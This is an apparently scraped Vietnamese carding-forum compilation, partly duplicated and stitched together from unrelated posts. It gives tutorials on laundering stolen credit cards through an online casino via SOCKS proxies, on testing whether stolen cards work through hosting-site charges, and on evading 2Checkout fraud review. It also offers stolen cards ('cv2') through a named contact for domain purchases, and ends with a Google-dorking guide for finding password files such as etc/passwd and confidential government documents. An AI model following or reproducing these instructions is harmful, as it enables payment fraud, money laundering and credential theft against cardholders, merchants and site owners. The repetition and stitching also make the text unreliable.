then AE reg 1 cái nick , nhớ lấy tên theo thằng chủ card nhá
then AE vào Cashier để add money vào nick
AE chon mục credit card ấy (mà nhớ xài luôn con sock 5 mà AE dùng cho sock cap nhá ).Hì ,bi giờ thì add money vào ,min 200$/day đấy.
Thành công rồi thì AE rủ ông nào đó ,có cc ở VN cũng được ,reg nick thật vào (ông này ko cần fake ip luôn vì trang này cho VN play mà).Xong đâu đó AE vào đánh tay đôi với ổng ,thả cho ổng ăn hết tiền mình luôn.Xong rồi bắt ông chia money cho mình.
Kinh nghiệm check CC ( tìm hiểu rõ )
hiện tại thì bây giờ có khá nhiều site check cvv
nhưng có 1 điều mà hầu như ko ai để ý đến là mỗi lần check đó cho dù chúng ta chưa confirm order hoặc place order thì bọn chó đóa nó vẫn lấy tiền trong cảd của mình. để xác nhận điều này mình đã làm thử 1 cuộc khảo sát
trước hết tớ tạo 1 con card visa debit sau đó login vào bank acc của mình ( card gì thì chưa thể nói được )
hiện nay trong balance của kid là cóa 200$ tiền mặt OK chúng ta hãy làm 1 cuộc thẩm tra kết quả của con cc
kid vào 1and1 order 1 cái server đắt nhất + 20 cái domain và giá của nó đã lền đến 512$ ok tiếp tục đến chỗ cuối kid điền card để check OK qua tôt ( qua với con cc kid đã tạo nhé )
tại sao nó lại cho qua như vậy , theo kid nghĩ là thế này : trong khi check card 1and1 hay tất cả các bộ máy check tiền online khác nó chỉ kiểm tra số tiền tối thiểu cho phép để bạn dùng cho transaction (dịch vụ) này sau khi check và back lại kid vào bank F5 1 cái thấy tiền bị trừ đi 5,99$ quái lạ sao card mình có 200$ đi mua con server 512$ mà mất có gần 6$. tức là đây là cái phí dịch vụ phải trả cho thằng chó 1and1 đó .
vấn đề này được giải thích rất rõ cho những bạn thườn mua host hay domain mà ko được active là vậy, card chỉ đủ để bạn đóng phí dao dịch chứ ko đuể để hoàn tất giao dịch
lần thứ 2 kid mua 1 cái host và 1 số domain khác trị giá là 147$
ok vẫn dùng cái con cc kid tạo ra đó ( hiện nay nó còn 200$ - 5.99$ = 194.01$) chú ý là lần dao dịch trước kid chưa place order của mình đâu nhé
ok lần này kid place order lun và thế là ngó sang cái bank card của mình
tiền bị trừ đi 5.99$ nữa ( bà nội mày ) còn có 188.02$ <~~ có đung ko nhỉ ok ngồi hút điếu thuốc và hack shop khác , 1 giờ sau thấy thằng chả 1and1 send cái mail acc hosting thì login vào bank hic má nhà nó tốn thêm 147$ nữa vậy là con card sạch làu wa bài tương thuật này chỉ muốn nói cho anh em bít là check cc như thía nào thoai tức là cho du các bạn có chọn mua cái gì hàng 9999999999999$ chăng nữa mà chỉ cần con card đó có 5,99$ là nó cho qua liền , đây là minh nói ở 1and1 thoai còn nới khác ko có time nghiên cứu nhưng chắc chắn rằng thàng nào cũng vậy tìm được thằng nào nó lấy tièn của mình càng ít càng tốt wallet và mấy trang bán sex chả bít anh em nào rảnh add card debit rùi check cho anh em ha có thể bạn ko sai nhưng theo tôi biết thì ko có ngôn ngữ nào check được tiền trong card cả và những site cho order online tất cả phải thông qua bank , còn nếu bạn nói card hợp lệ là qua được thì hình như càng ko đúng bởi 1 cái card hợp lệ nhưng ko có $ chẳng nhẽ vẫn qua được sao . ví dụ cái card tớ làm là hợp lệ nhưng ko có $ ~~> ko wa được . còn vấn đề thằng chủ online hay ko online thì chả có cái dịch vụ online nào mà ko có nhân viên trực ( tôi chat với support hoài ) tiền được chuyển tự động nó chỉ tính đến trường hợp phát hiện fraund hoặc bị refunds do chủ card ko đồng ý và hủy bỏ transaction đó và cũng có thể card ko OK từ provider
vâyj thôi ai bít chỉ thêm
Tut đầy đủ luôn.
vào viet-casino.com
down soft đánh bài về
xong dùng sock cap cho cái soft này
then AE reg 1 cái nick , nhớ lấy tên theo thằng chủ card nhá
then AE vào Cashier để add money vào nick
AE chon mục credit card ấy (mà nhớ xài luôn con sock 5 mà AE dùng cho sock cap nhá ).Hì ,bi giờ thì add money vào ,min 200$/day đấy.
Thành công rồi thì AE rủ ông nào đó ,có cc ở VN cũng được ,reg nick thật vào (ông này ko cần fake ip luôn vì trang này cho VN play mà).Xong đâu đó AE vào đánh tay đôi với ổng ,thả cho ổng ăn hết tiền mình luôn.Xong rồi bắt ông chia money cho mình.
Kinh nghiệm check CC ( tìm hiểu rõ )
hiện tại thì bây giờ có khá nhiều site check cvv
nhưng có 1 điều mà hầu như ko ai để ý đến là mỗi lần check đó cho dù chúng ta chưa confirm order hoặc place order thì bọn chó đóa nó vẫn lấy tiền trong cảd của mình. để xác nhận điều này mình đã làm thử 1 cuộc khảo sát
trước hết tớ tạo 1 con card visa debit sau đó login vào bank acc của mình ( card gì thì chưa thể nói được )
hiện nay trong balance của kid là cóa 200$ tiền mặt OK chúng ta hãy làm 1 cuộc thẩm tra kết quả của con cc
kid vào 1and1 order 1 cái server đắt nhất + 20 cái domain và giá của nó đã lền đến 512$ ok tiếp tục đến chỗ cuối kid điền card để check OK qua tôt ( qua với con cc kid đã tạo nhé )
tại sao nó lại cho qua như vậy , theo kid nghĩ là thế này : trong khi check card 1and1 hay tất cả các bộ máy check tiền online khác nó chỉ kiểm tra số tiền tối thiểu cho phép để bạn dùng cho transaction (dịch vụ) này sau khi check và back lại kid vào bank F5 1 cái thấy tiền bị trừ đi 5,99$ quái lạ sao card mình có 200$ đi mua con server 512$ mà mất có gần 6$. tức là đây là cái phí dịch vụ phải trả cho thằng chó 1and1 đó .
vấn đề này được giải thích rất rõ cho những bạn thườn mua host hay domain mà ko được active là vậy, card chỉ đủ để bạn đóng phí dao dịch chứ ko đuể để hoàn tất giao dịch
lần thứ 2 kid mua 1 cái host và 1 số domain khác trị giá là 147$
ok vẫn dùng cái con cc kid tạo ra đó ( hiện nay nó còn 200$ - 5.99$ = 194.01$) chú ý là lần dao dịch trước kid chưa place order của mình đâu nhé
ok lần này kid place order lun và thế là ngó sang cái bank card của mình
tiền bị trừ đi 5.99$ nữa ( bà nội mày ) còn có 188.02$ <~~ có đung ko nhỉ ok ngồi hút điếu thuốc và hack shop khác , 1 giờ sau thấy thằng chả 1and1 send cái mail acc hosting thì login vào bank hic má nhà nó tốn thêm 147$ nữa vậy là con card sạch làu wa bài tương thuật này chỉ muốn nói cho anh em bít là check cc như thía nào thoai tức là cho du các bạn có chọn mua cái gì hàng 9999999999999$ chăng nữa mà chỉ cần con card đó có 5,99$ là nó cho qua liền , đây là minh nói ở 1and1 thoai còn nới khác ko có time nghiên cứu nhưng chắc chắn rằng thàng nào cũng vậy tìm được thằng nào nó lấy tièn của mình càng ít càng tốt wallet và mấy trang bán sex chả bít anh em nào rảnh add card debit rùi check cho anh em ha có thể bạn ko sai nhưng theo tôi biết thì ko có ngôn ngữ nào check được tiền trong card cả và những site cho order online tất cả phải thông qua bank , còn nếu bạn nói card hợp lệ là qua được thì hình như càng ko đúng bởi 1 cái card hợp lệ nhưng ko có $ chẳng nhẽ vẫn qua được sao . ví dụ cái card tớ làm là hợp lệ nhưng ko có $ ~~> ko wa được . còn vấn đề thằng chủ online hay ko online thì chả có cái dịch vụ online nào mà ko có nhân viên trực ( tôi chat với support hoài ) tiền được chuyển tự động nó chỉ tính đến trường hợp phát hiện fraund hoặc bị refunds do chủ card ko đồng ý và hủy bỏ transaction đó và cũng có thể card ko OK từ provider
vâyj thôi ai bít chỉ thêm
Zipcode phone các nước
Denmark 45
|
Diego Garcia
246
|
Djibouti 253
|
Dominica 767
|
Dominican
Republic 809
|
|||
Index -E-
|
|||
Easter
Island 56
|
Ecuador 593
|
Ambato 2
|
Cayambe 2
|
Cuenca 7
|
Esmeraldas 2
|
Guayaquil 4
|
Ibarra 3
|
Loja 7
|
Machachi 2
|
Machala 4
|
Manta 4
|
Portoviejo 4
|
Quevedo 4
|
Quito 2
|
Salinas 4
|
Santo
Domingo 2
|
Tulcan 2
|
Egypt 20
|
Alexandria 3
|
Aswan 97
|
Asyut 88
|
Benhas 13
|
Cairo 2
|
Damanhour 45
|
El Mahallah
43
|
El Mansoura
50
|
Luxor 95
|
Mahalah El
Kobra 43
|
Port Said 66
|
Oena 96
|
Shebin El
Kom 48
|
Sohag 93
|
Suez 62
|
Tanta 40
|
El Salvador
503
|
Equatorial
Guinea 240
|
Eritrea 291
|
Estonia 372
|
Haapsalu 47
|
Jõgeva 77
|
Kärdla 46
|
Kohtla-Järve
33
|
Kuressaare
45
|
Narva 35
|
Paide 38
|
Pärnu 44
|
Põlva 79
|
Rakvere 32
|
Rapla 48
|
Sillamäe 39
|
Tallinn 2
(variable)
|
Tartu 7
|
Valga 76
|
Viljandi 43
|
Võru 78
|
Ethiopia 251
|
Addis Adaba
1
|
Assab 3
|
Dire Dawa 5
|
Index -F-
|
|||
Falkland
Islands 500
|
Faroe
Islands 298
|
Fiji 679
|
Finland 358
|
Espoo-Esbo 9
|
Forssa 3
|
Helsinki 9
|
Joensuu 13
|
Jyvaskyla 14
|
Kajaani 8
|
Kemi 16
|
Kotka 5
|
Kuopio 17
|
Kuusamo 8
|
Lahti 3
|
Lappeenranta
5
|
Mariehamn 18
|
Mikkeli 15
|
Oulu 8
|
Pori 2
|
Rovaniemi 10
|
Savonlinna
15
|
Tammefors 3
|
Tampere 3
|
Turku 2
|
Uleaborg 8
|
Vassa 6
|
Vanda, Vanta
9
|
Varkaus 17
|
France 33
|
||
Aix-En-Provence
442
|
Biarritz 559
|
Bordeaux 556
|
Cannes 493
|
Cherbourg
233
|
Corsica 495
|
Grenoble 476
|
Le Havre 235
|
Lille 320
|
Lourdes 562
|
Lyon 472-478
|
Marseille
491
|
Montpellier
467
|
Nantes 240
|
Nice 493
|
Paris 1
|
Reims 326
|
Rouen 235
|
St. Etienne
477
|
St. Tropez
494
|
Strasbourg
388
|
Toulon 494
|
Toulouse 561
|
Tours 247
|
Vichy 470
|
French
Antilles 596
|
French
Guyana 594
|
French
Polynesia 689
|
Fyrom
(Macedonia) 389
|
Skopje 91
|
||
Đây là ví dụ 1
số phone code các nước, và thành phố rất quan trọng trong việc dùng gọi điện ra
nước ngoài
Vào trang này đế lấy đây thông tin đầy đủ thông tin code phone các nước các vùng http://www.the-acr.com/codes/cntrycd.htm
Vào trang này đế lấy đây thông tin đầy đủ thông tin code phone các nước các vùng http://www.the-acr.com/codes/cntrycd.htm
Kinh nghiệm qua 2CO
Thấy Jim bảo là trong vip mới có cái này nên tôi post ngoài này cho anh em tham khảo, thực ra bài này tôi đã post ở TC và cũng có 1 bài của bạn TCH.. gì gì ấy, tôi nghĩ nếu bạn tránh được mấy cái này thì 99.99% là bạn sẽ qua được 2CO
Thực ra thi qua 2CO không khó, nhưng quan trọng là để cho nó khỏi bị nghi là Fraud mới khó, nếu bạn order cái gì mà nó cho download ngay mà thấy qua 2CO thì ok, khỏi nói gòi, còn nếu mà phải đợi thằng Admin website ( Host, Domain ) nó review thì mới khó, bởi vì khi mình order thì thằng 2CO nó sẽ gửi 1 email về cho admin, nếu OK hết thì nó chỉ báo là có order, còn nếu nó cảm thấy đáng nghi thì ngay lập tức nó sẽ gưi luôn 1 email cho thằng admin với nội dung sau
Dear Sir or Madam:
The following order will be manually reviewed by the 2Checkout.com Fraud Department and has not yet
been Approved for final fulfillment. Please allow sufficient time for a complete review of this transaction
before shipping tangible items or distributing electronic items.
This DOES NOT mean that the order was fraudulent. An automated review of the order by 2Checkout
indicates a reasonable concern of fraud risk which qualifies it for further evaluation.
We recommend that an attempt be made to contact the buyer and confirm the legitimacy of this purchase.
If attempts are unsuccessful, please be sure to cancel the order.
2Checkout Order Number: xxxxxxxxxxx
Sau đó thằng 2CO sẽ call theo cái số tel mà mình điền lúc đăng kí, nếu gặp được thằng order thì nó sẽ xác nhận vào coi như order thành công, còn nếu không call đuợc thì dĩ nhiên là order này la fraud
Các lý do để 2CO nghi ngờ là Fraud
phone is invalid. E-mail does not match the customer. IP is in a different location than the billing.
Từ thông tin trên có thể suy ra là card của thằng này đã order 2CO một lần gòi, lúc trước order nó điền phone, email khác, bây giờ mình order điền khác là nó có lý do để nghi ngờ ngay
Có thể nói order 2CO mà nó báo là thành công thì 90%, còn để nó không bị nghi là fraud thì chỉ có 50% thôi, vì vậy theo kinh nghiệm cùa tôi thì A_E order qua 2CO tuyệt đối không được dùng VISA là 1 ( nên dùng Amex hoặc Dis ), không dùng email free là 2, không dùng IP VN là 3, Thêm một chút may mắn là 4 ( Card chưa qua 2CO lần nào )
Tất nhiên đó chỉ là kinh nghiệm của tôi, ai biết thêm điều gì thì post vào để anh em học hỏi, tuy nhiên tôi nghĩ kinh nghiệm của tôi là 99% rồi, cũng chả còn gì nữa đâu
Hướng Dẫn Bạn Tạo 1 Hosting and Domain Miễn phí (Dạng hackerjpvn.com) !
Thật ra bây giờ để có 1 tên miền .com .net .org thì thật đơn giản phải ko?Nhưng để làm sao có 1 Host thật tốt cho các bạn?Và vấn đề là làm sao để sự dụng ko mất tiền <--- Vấn đề nan giải của người Việt chúng ta... 1. Bước thứ nhất là về Domain ,bạn cần kiếm cho mình 1 tên miền .com .net .org sao cho oai 1 chút. +. Các địa chỉ kiếm tên miền có thể DNS được ở dưới đây : =http://www.1and1.com/ <-- buy bằng cv2 =http://www.domains.yahoo.com/ <-- buy bằng cv2 =http://www.domainsatcost.ca/ <-- buy bằng cc =http://namescout.com/ <-- buy bằng cc =http://www.mydomain.com/ <-- buy bằng cv2 =http://dnbuy.com/ <-- buy bằng cv2 =http://streamline.net/ =http://www.buildwebsite4u.com/building/domain-registration.shtml <-- các lựa trọn về nơi buy domain đơn giản. Và rất nhiều nơi khác nếu bạn cần cứ add nick yeumemai_jp để hỏi đáp. +. Vấn đề tiếp theo ở đây là bạn lấy đâu ra CC và Cv2 ?Không thành vấn đề ! Vẫn chỉ 1 nick yeumemai_jp hoặc email yeumemai_jp@yahoo.com ( Website =http://www.hackerjpvn.com/ ). 1 con cv2 hoặc cc để reg domain chỉ khoảng 20 USD ( nơi cao nhất )/1 năm nên Hưng cũng ko kiệt gì đâu. bạn nào có rồi thì thôi ,chưa có thì cứ xin nhé !. 2. Bước thứ 2 là về host : +. Vấn đề trên là về reg Domain phải ko ạ?Vấn đề reg domain thì quá đơn giản rồi nên Hưng ko hướng dẫn nữa.Mua hàng online trên mạng có ai là ko biết đâu !. +. Khi đã có Domain rồi thì bạn làm ơn quản lý cẩn thận nhé. Sau đó thì vào website này (Cái này với là quan trọng ). =http://new.pipni.cz/overeni.phtml Sau đó làm như hình dưới ( Trọn English cho dễ nhìn ). =http://hackerjpvn.com/anhdep/anhhostdomain/1.GIF Ở phần 1 bạn đăng ký domain là gì? VD : ở phần 1 Hưng đăng ký domain là hackerjpvn.com bây giờ bạn hãy gõ vào ô " Doména " Domain mà bạn đã đăng ký ( Như hình dưới !). =http://hackerjpvn.com/anhdep/anhhostdomain/2.GIF Sau khi điền ở đó là hackerjpvn và phần kia trọn .com rồi bạn bấm vào Check <-- màu xanh. Và nó chạy xong sẽ hiện ra như hình dưới đây : =http://hackerjpvn.com/anhdep/anhhostdomain/3.GIF Có chữ Forwar màu xanh phải không bạn? Bấm chuột trái vào đó. Và nó sẽ hiện tiếp ra hình sau. =http://hackerjpvn.com/anhdep/anhhostdomain/4.GIF Ở phần Program trọn Free còn mọi phần khác để nguyên. Rồi bấm tiếp vào Forwar . Cứ làm sao cho hiện ra cái hình dưới đây là được. =http://hackerjpvn.com/anhdep/anhhostdomain/5.GIF Điền đúng mọi thông tin như hình 5 nhé ! Chú ý phải điền mail chính xác để nó còn gửi thông tin về email của mình. Khi điền xong hết rồi thì bấm vào Forwar Tiếp theo thì bấm vào đồng ý và bấm vào Forwar tiếp. Như hình dưới.( Hình 6 ). =http://hackerjpvn.com/anhdep/anhhostdomain/6.GIF Rồi nó sẽ hiện ra 1 khung nữa có bản kết thúc. Kéo xuống cuối cùng bấm 1 lần cuối vào Forwar nữa là có 1 mail tự động gửi đến hộp thư của mình... Đến phần này thì đơn giản rồi phải ko? Bọn pipni sẽ tự động tạo 1 host cho mình ,mình chỉ cần vào mail đọc và lấy phần DNS của nó ,điền vào trong phần Quản Lý Domain của mình giống thế là khoảng 10 đến 15 phút sau Domain và Host của mình đã kết hợp lại thành 1 cái host rất good !. Bài viết này do thời gian hạn chế và có rất nhiều người đang gọi Hưng nên phải đi trả lời đã .Nếu ai có thời gian thì bổ xung thêm nhé ! Mọi thắc mắc về cái này thì bạn tự nghiên cứu nhé. Có gì xin vào =http://hackerjpvn.com or =www.hackerjpvn.com nhé ! Chúc tất cả các member trên đất nước Việt Nam đều có 1 domain và 1 host riêng mà ko mất tiền. Xin chúc Nhà Nhà có web ,người người có web... Hờ hờ -------------------
Thấy Jim bảo là trong vip mới có cái này nên tôi post ngoài này cho anh em tham khảo, thực ra bài này tôi đã post ở TC và cũng có 1 bài của bạn TCH.. gì gì ấy, tôi nghĩ nếu bạn tránh được mấy cái này thì 99.99% là bạn sẽ qua được 2CO
Thực ra thi qua 2CO không khó, nhưng quan trọng là để cho nó khỏi bị nghi là Fraud mới khó, nếu bạn order cái gì mà nó cho download ngay mà thấy qua 2CO thì ok, khỏi nói gòi, còn nếu mà phải đợi thằng Admin website ( Host, Domain ) nó review thì mới khó, bởi vì khi mình order thì thằng 2CO nó sẽ gửi 1 email về cho admin, nếu OK hết thì nó chỉ báo là có order, còn nếu nó cảm thấy đáng nghi thì ngay lập tức nó sẽ gưi luôn 1 email cho thằng admin với nội dung sau
Dear Sir or Madam:
The following order will be manually reviewed by the 2Checkout.com Fraud Department and has not yet
been Approved for final fulfillment. Please allow sufficient time for a complete review of this transaction
before shipping tangible items or distributing electronic items.
This DOES NOT mean that the order was fraudulent. An automated review of the order by 2Checkout
indicates a reasonable concern of fraud risk which qualifies it for further evaluation.
We recommend that an attempt be made to contact the buyer and confirm the legitimacy of this purchase.
If attempts are unsuccessful, please be sure to cancel the order.
2Checkout Order Number: xxxxxxxxxxx
Sau đó thằng 2CO sẽ call theo cái số tel mà mình điền lúc đăng kí, nếu gặp được thằng order thì nó sẽ xác nhận vào coi như order thành công, còn nếu không call đuợc thì dĩ nhiên là order này la fraud
Các lý do để 2CO nghi ngờ là Fraud
phone is invalid. E-mail does not match the customer. IP is in a different location than the billing.
Từ thông tin trên có thể suy ra là card của thằng này đã order 2CO một lần gòi, lúc trước order nó điền phone, email khác, bây giờ mình order điền khác là nó có lý do để nghi ngờ ngay
Có thể nói order 2CO mà nó báo là thành công thì 90%, còn để nó không bị nghi là fraud thì chỉ có 50% thôi, vì vậy theo kinh nghiệm cùa tôi thì A_E order qua 2CO tuyệt đối không được dùng VISA là 1 ( nên dùng Amex hoặc Dis ), không dùng email free là 2, không dùng IP VN là 3, Thêm một chút may mắn là 4 ( Card chưa qua 2CO lần nào )
Tất nhiên đó chỉ là kinh nghiệm của tôi, ai biết thêm điều gì thì post vào để anh em học hỏi, tuy nhiên tôi nghĩ kinh nghiệm của tôi là 99% rồi, cũng chả còn gì nữa đâu
Hướng Dẫn Bạn Tạo 1 Hosting and Domain Miễn phí (Dạng hackerjpvn.com) !
Thật ra bây giờ để có 1 tên miền .com .net .org thì thật đơn giản phải ko?Nhưng để làm sao có 1 Host thật tốt cho các bạn?Và vấn đề là làm sao để sự dụng ko mất tiền <--- Vấn đề nan giải của người Việt chúng ta... 1. Bước thứ nhất là về Domain ,bạn cần kiếm cho mình 1 tên miền .com .net .org sao cho oai 1 chút. +. Các địa chỉ kiếm tên miền có thể DNS được ở dưới đây : =http://www.1and1.com/ <-- buy bằng cv2 =http://www.domains.yahoo.com/ <-- buy bằng cv2 =http://www.domainsatcost.ca/ <-- buy bằng cc =http://namescout.com/ <-- buy bằng cc =http://www.mydomain.com/ <-- buy bằng cv2 =http://dnbuy.com/ <-- buy bằng cv2 =http://streamline.net/ =http://www.buildwebsite4u.com/building/domain-registration.shtml <-- các lựa trọn về nơi buy domain đơn giản. Và rất nhiều nơi khác nếu bạn cần cứ add nick yeumemai_jp để hỏi đáp. +. Vấn đề tiếp theo ở đây là bạn lấy đâu ra CC và Cv2 ?Không thành vấn đề ! Vẫn chỉ 1 nick yeumemai_jp hoặc email yeumemai_jp@yahoo.com ( Website =http://www.hackerjpvn.com/ ). 1 con cv2 hoặc cc để reg domain chỉ khoảng 20 USD ( nơi cao nhất )/1 năm nên Hưng cũng ko kiệt gì đâu. bạn nào có rồi thì thôi ,chưa có thì cứ xin nhé !. 2. Bước thứ 2 là về host : +. Vấn đề trên là về reg Domain phải ko ạ?Vấn đề reg domain thì quá đơn giản rồi nên Hưng ko hướng dẫn nữa.Mua hàng online trên mạng có ai là ko biết đâu !. +. Khi đã có Domain rồi thì bạn làm ơn quản lý cẩn thận nhé. Sau đó thì vào website này (Cái này với là quan trọng ). =http://new.pipni.cz/overeni.phtml Sau đó làm như hình dưới ( Trọn English cho dễ nhìn ). =http://hackerjpvn.com/anhdep/anhhostdomain/1.GIF Ở phần 1 bạn đăng ký domain là gì? VD : ở phần 1 Hưng đăng ký domain là hackerjpvn.com bây giờ bạn hãy gõ vào ô " Doména " Domain mà bạn đã đăng ký ( Như hình dưới !). =http://hackerjpvn.com/anhdep/anhhostdomain/2.GIF Sau khi điền ở đó là hackerjpvn và phần kia trọn .com rồi bạn bấm vào Check <-- màu xanh. Và nó chạy xong sẽ hiện ra như hình dưới đây : =http://hackerjpvn.com/anhdep/anhhostdomain/3.GIF Có chữ Forwar màu xanh phải không bạn? Bấm chuột trái vào đó. Và nó sẽ hiện tiếp ra hình sau. =http://hackerjpvn.com/anhdep/anhhostdomain/4.GIF Ở phần Program trọn Free còn mọi phần khác để nguyên. Rồi bấm tiếp vào Forwar . Cứ làm sao cho hiện ra cái hình dưới đây là được. =http://hackerjpvn.com/anhdep/anhhostdomain/5.GIF Điền đúng mọi thông tin như hình 5 nhé ! Chú ý phải điền mail chính xác để nó còn gửi thông tin về email của mình. Khi điền xong hết rồi thì bấm vào Forwar Tiếp theo thì bấm vào đồng ý và bấm vào Forwar tiếp. Như hình dưới.( Hình 6 ). =http://hackerjpvn.com/anhdep/anhhostdomain/6.GIF Rồi nó sẽ hiện ra 1 khung nữa có bản kết thúc. Kéo xuống cuối cùng bấm 1 lần cuối vào Forwar nữa là có 1 mail tự động gửi đến hộp thư của mình... Đến phần này thì đơn giản rồi phải ko? Bọn pipni sẽ tự động tạo 1 host cho mình ,mình chỉ cần vào mail đọc và lấy phần DNS của nó ,điền vào trong phần Quản Lý Domain của mình giống thế là khoảng 10 đến 15 phút sau Domain và Host của mình đã kết hợp lại thành 1 cái host rất good !. Bài viết này do thời gian hạn chế và có rất nhiều người đang gọi Hưng nên phải đi trả lời đã .Nếu ai có thời gian thì bổ xung thêm nhé ! Mọi thắc mắc về cái này thì bạn tự nghiên cứu nhé. Có gì xin vào =http://hackerjpvn.com or =www.hackerjpvn.com nhé ! Chúc tất cả các member trên đất nước Việt Nam đều có 1 domain và 1 host riêng mà ko mất tiền. Xin chúc Nhà Nhà có web ,người người có web... Hờ hờ -------------------
Google Hacks By Debasis Mohanty, by Debasis
Mohanty (Orissa, India)
www.hackingspirits.com, Dịch bởi freewarez@ddth.com
Những cú pháp tìm kiếm nâng cao với Google
Dưới đây thảo luận về những lệnh đặc biệt của Google và tôi sẽ giải thích từng lệnh một cách ngắn gọn và nói rõ nó được sử dụng như thế nào để tìm kiếm thông tin.
[ intitle: ]
Cú pháp “intitle:” giúp Google giới hạn kết quả tìm kiếm về những trang có chứa từ đó trong tiêu đề. Ví dụ, “intitle: login password” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "login" trong tiêu đề, và từ "password" nằm ở đâu đó trong trang.
Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong tiêu đề của trang thì ta có thể dùng “allintitle:” thay cho “intitle” để có kết quả là những trang có chứa tất cả những từ đó trong tiêu đề. Ví dụ như dùng
“intitle: login intitle: password” cũng giống như truy vấn “allintitle: login password”.
[ inurl: ]
Cú pháp “inurl:” giới hạn kết quả tìm kiếm về những địa chỉ URL có chứa từ khóa tìm kiếm. Ví dụ: “inurl: passwd” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "passwd" trong URL.
Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong URL thì ta có thể dùng “allinurl:” thay cho “inurl” để được kết quả là những URL chứa tất cả những từ khóa tìm kiếm.Ví dụ: “allinurl: etc/passwd“ sẽ tìm kiếm những URL có chứa “etc” và “passwd”. Ký hiệu gạch chéo (“/”) giữa các từ sẽ bị Google bỏ qua.
[ site: ]
Cú pháp “site:” giới hạn Google chỉ truy vấn những từ khóa xác định trong một site hoặc tên miền riêng biệt. Ví dụ: “exploits site:hackingspirits.com” (không có ngoặc kép) sẽ tìm kiếm từ khóa “exploits” trong những trang hiện có trong tất cả các link của tên miền “hackingspirits.com”. Không có khoảng trống nào giữa “site:” và “tên miền”.
[ filetype: ]
Cú pháp “filetype:” giới hạn Google chỉ tìm kiếm những files trên internet có phần mở rộng riêng biệt (Ví dụ: doc, pdf hay ppt v.v...). Ví dụ : “filetype:doc site:gov confidential” (không có ngoặc kép) sẽ tìm kiếm những file có phẩn mở rộng là “.doc” trong tất cả những tên miền của chính phủ có phần mở rộng là “.gov” và chứa từ “confidential”(bí mật) trong trang hoặc trong file “.doc”. Ví dụ . Kết quả sẽ bao gồm những liên kết đến tất cả các file văn bản bí trên các site của chính phủ.
[ link: ]
Cú pháp “link:” sẽ liệt kê những trang web mà có các liên kết đến đến những trang web chỉ định. Ví dụ :
chuỗi “link:www.securityfocus.com” sẽ liệt kê những trang web có liên kết trỏ đến trang chủ SecurityFocus.
Chú ý không có khoảng trống giữa "link:" và URL của trang Web.
[ related: ]
Cú pháp “related:” sẽ liệt kê các trang Web "tương tự" với trang Web chỉ định. Ví dụ :“related:www.securityfocus.com” sẽ liệt kê các trang web tương tự với trang chủ Securityfocus. Nhớ rằng không có khoảng trống giữa "related:" và URL của trang Web.
[ cache: ]
Truy vấn “cache:” sẽ cho kết quả là phiên bản của trang Web mà mà Google đã lưu lại. Ví dụ:“cache:www.hackingspirits.com” sẽ cho ra trang đã lưu lại bởi Google's. Nhớ rằng không có khoảng trống giữa "cache:" và URL của trang web.
Nếu bạn bao gồm những từ khác trong truy vấn, Google sẽ điểm sáng những từ này trong văn bản đã được lưu lại.
Ví dụ: “cache:www.hackingspirits.com guest” sẽ cho ra văn bản đã được lưu lại có từ "guest" được điểm sáng.
[ intext: ]
Cú pháp “intext:” tìm kiếm các từ trong một website riêng biệt. Nó phớt lờ các liên kết hoặc URL và tiêu đề của trang.
Ví dụ: “intext:exploits” (không có ngoặc kép) sẽ cho kết quả là những liên kết đến những trang web có từ khóa tìm kiếm là "exploits" trong các trang của nó.
[ phonebook: ]
Cú pháp“phonebook” tìm kiếm thông tin về các địa chỉ đường phố ở Mỹ và số điện thoại. Ví dụ:“phonebook:Lisa+CA” sẽ liệt kê tất cả các tên người có từ “Lisa” trong tên và ở “California (CA)”. Cú pháp này có thể được sử dụng như là một công cụ tuyệt vời của tin tặc trong trường hợp ai đó muốn tìm kiếm thông tin cá nhân cho công việc xã hội.
Truy vấn các site hoặc server dễ bị tấn công sử dụng các cú pháp nâng cao của Google
Những cú pháp truy vấn nâng cao thảo luận ở trên thực sự có thể giúp người ta chính xác hóa các tìm kiếm và có được những gì họ thực sự tìm kiếm.
Bây giờ Google trở thành một máy tìm kiếm thông minh, những người dùng có ác ý không hề bận tâm khai thác khả năng của nó để đào bới những thông tin bí mật từ internet mà chỉ có sự truy cập giới hạn. Bây giờ tôi sẽ thảo luận những kỹ thuật này một cách chi tiết làm thế nào để những người dùng ác tâm đào bới thông tin trên internet sử dụng Google như một công cụ.
Sử dụng cú pháp “Index of ” để tìm kiếm các site cho phép duyệt chỉ mục
Một webserver(máy chủ web) cho phép duyệt chỉ mục nghĩa là bất kỳ ai có thể duyệt các thư mục của webserver như các thư mục nội bộ thông thường. Ở đây tôi sẽ thảo luận làm thế nào để sử dụng cú pháp "index of" để có một danh sách các liên kết đến webserver cho phép duyệt thư mục.
Cách này trở thành một nguồn dễ dàng cho việc thu thập thông tin của tin tặc. Tưởng tưởng nếu họ nắm được các file mật khẩu hoặc các file nhạy cảm khác mà bình thưởng không thể thấy được trên internet.
Dưới đây là vài Ví dụ sử dụng để có được quyền truy cập vào rất nhiều thông tin nhạy cảm dễ dàng hơn rất nhiều:
www.hackingspirits.com, Dịch bởi freewarez@ddth.com
Những cú pháp tìm kiếm nâng cao với Google
Dưới đây thảo luận về những lệnh đặc biệt của Google và tôi sẽ giải thích từng lệnh một cách ngắn gọn và nói rõ nó được sử dụng như thế nào để tìm kiếm thông tin.
[ intitle: ]
Cú pháp “intitle:” giúp Google giới hạn kết quả tìm kiếm về những trang có chứa từ đó trong tiêu đề. Ví dụ, “intitle: login password” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "login" trong tiêu đề, và từ "password" nằm ở đâu đó trong trang.
Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong tiêu đề của trang thì ta có thể dùng “allintitle:” thay cho “intitle” để có kết quả là những trang có chứa tất cả những từ đó trong tiêu đề. Ví dụ như dùng
“intitle: login intitle: password” cũng giống như truy vấn “allintitle: login password”.
[ inurl: ]
Cú pháp “inurl:” giới hạn kết quả tìm kiếm về những địa chỉ URL có chứa từ khóa tìm kiếm. Ví dụ: “inurl: passwd” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "passwd" trong URL.
